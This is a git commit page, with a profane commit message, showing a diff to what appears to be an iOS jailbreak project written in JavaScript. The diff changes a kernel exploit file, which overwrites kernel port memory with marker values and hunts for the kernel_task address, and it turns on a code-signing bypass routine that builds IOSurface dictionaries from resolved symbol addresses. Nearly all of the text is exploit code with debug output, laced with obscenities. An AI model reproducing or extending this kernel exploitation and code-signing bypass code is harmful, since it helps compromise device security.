fuck this shit i'm out seriously fuck you

author: spv420 <spv@spv.sh> 2022-07-29 14:32:40 -0400
committer: spv420 <spv@spv.sh> 2022-07-29 14:32:40 -0400
commit: fa472ec3d9b5cdb2c1517cf2795ed65434867078 (patch)
tree: 187b690920b03615d8a9cf7f1550e66ac4b1857f /src
parent: eb2358cbd63c897227d5aaa3a1fc3844ad09e26b (diff)
3 files changed, 17 insertions, 6 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index 12388a0..cc9302f 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -13,6 +13,7 @@ var my_kIOSurfaceBytesPerRow;
 var my_kIOSurfaceWidth;
 var my_kIOSurfaceHeight;
 var my_kIOSurfacePixelFormat;
+var kCFAllocatorDefault;
 
 function csbypass() {
 	printf("hello from csbypass!\n");
@@ -34,11 +35,12 @@ function memcpy_exec(dst, src, size) {
 	printf("%x %x\n", CFDictionarySetValue_addr + get_dyld_shc_slide(), dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue"));
 	dict = CFDictionaryCreateMutable(0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
 	printf("dict: %p\n", dict);
-	var test = CFNumberCreate(0, kCFNumberSInt32Type, pitch);
+	var test = CFNumberCreate(read_u32(kCFAllocatorDefault), kCFNumberSInt32Type, pitch);
 	printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
 	scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
 	callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
-	CFDictionarySetValue(dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
+	CFDictionarySetValue(dict, read_u32(my_kIOSurfaceBytesPerRow), test, 0);
+	printf("lol420\n");
 	CFDictionarySetValue(dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
 	CFDictionarySetValue(dict, read_u32(my_kIOSurfaceHeight), read_u32(my_kIOSurfaceHeight + 4), read_u32(my_kIOSurfaceHeight + 8), read_u32(my_kIOSurfaceHeight + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height));
 	CFDictionarySetValue(dict, read_u32(my_kIOSurfacePixelFormat), read_u32(my_kIOSurfacePixelFormat + 4), read_u32(my_kIOSurfacePixelFormat + 8), read_u32(my_kIOSurfacePixelFormat + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format));
@@ -61,6 +63,7 @@ function linkIOSurface() {
     my_IOSurfaceAcceleratorTransferSurface = dlsym(h, "IOSurfaceAcceleratorTransferSurface");
 
 	CFDictionarySetValue_addr = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue") - get_dyld_shc_slide();
+	kCFAllocatorDefault = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "kCFAllocatorDefault");
 
 	scall("printf", "%x %x %x\n", my_IOSurfaceAcceleratorCreate, my_IOSurfaceCreate, my_IOSurfaceAcceleratorTransferSurface);
 }
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 6f34aaf..47ff1c0 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -502,10 +502,15 @@ again: while (true) {
 	printf("fuck\n");
 
 	printf("fuck\n");
-	write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
+	for (var i = 0; i < 0x78; i += 4) {
+		write_u32(kport + i, 0x41410000 | i);
+	}
+	for (var i = 0; i < 0x78; i += 4) {
+		write_u32(kport + i + 0x78, 0x41420000 | i);
+	}
+//	write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
 	printf("fuck\n");
 //	write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
-	write_u32(ptr, 0x41414141 - BSDINFO_PID_OFFSET);
 	printf("fuck\n");
 	var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
 	printf("fuck\n");
@@ -539,6 +544,9 @@ again: while (true) {
 	printf("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
 	printf("fuck\n");
 	call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
+	if (kernel_task_addr === 0xffffffff) {
+		continue again;
+	}
 	scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
 	printf("fuck\n");
 
diff --git a/src/js/main.js b/src/js/main.js
index 75d730d..0a1de50 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -79,9 +79,9 @@ function main() {
 
 	setup_fancy_rw();
 
-//	csbypass();
+	csbypass();
 
-//	return;
+	return;
 
 
 	printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0'));
author	spv420 <spv@spv.sh>	2022-07-29 14:32:40 -0400
committer	spv420 <spv@spv.sh>	2022-07-29 14:32:40 -0400
commit	fa472ec3d9b5cdb2c1517cf2795ed65434867078 (patch)
tree	187b690920b03615d8a9cf7f1550e66ac4b1857f /src
parent	eb2358cbd63c897227d5aaa3a1fc3844ad09e26b (diff)